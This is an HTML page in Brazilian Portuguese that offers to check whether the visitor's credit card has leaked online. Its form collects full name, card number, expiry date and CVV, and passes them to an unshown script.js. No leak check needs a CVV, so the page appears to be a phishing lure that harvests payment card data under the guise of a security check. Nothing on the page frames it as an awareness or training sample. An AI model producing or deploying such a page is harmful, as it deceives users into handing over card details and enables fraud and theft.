<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verifique se seu cartão está vazado!</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            text-align: center;
            padding: 10px;
        }

        h1 {
            color: #333;
        }

        .container {
            background-color: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            display: inline-block;
        }

        input[type="text"], input[type="password"], input[type="month"] {
            width: 300px;
            padding: 10px;
            margin-top: 10px;
            border: 2px solid #ddd;
            border-radius: 5px;
            font-size: 16px;
        }

        input[type="submit"] {
            margin-top: 20px;
            padding: 10px 20px;
            background-color: #007bff;
            color: white;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #0056b3;
        }

        .result {
            margin-top: 20px;
            font-size: 18px;
            color: red;
        }

        .icon-container {
            margin-bottom: 0px;
        }

        img {
            width: 200px;
            height: 200px;
        }
    </style>
</head>
<body>
    <h1>Verifique se seu cartão de crédito está vazado na internet!</h1>
    
  
    <div class="icon-container">
        <img src="https://cdn-icons-png.flaticon.com/512/1323/1323032.png" alt="Ícone de cartão de crédito">
    </div>
    
    <div class="container">
        <form id="form">
            <input type="text" id="name" name="name" placeholder="Nome completo" required><br>
            <input type="text" id="cardNumber" name="cardNumber" placeholder="Número do cartão de crédito" maxlength="19" required><br>
            <input type="text" id="expiryDate" name="expiryDate" placeholder="Validade (MM/AA)" maxlength="5" required><br>
            <input type="text" id="cvv" name="cvv" placeholder="Código de segurança (CVV)" maxlength="3" required><br>
            <input type="submit" value="Verificar">
        </form>
        
        <div id="result" class="result"></div>
    </div>

    <script src="script.js"></script>
</body>
</html>
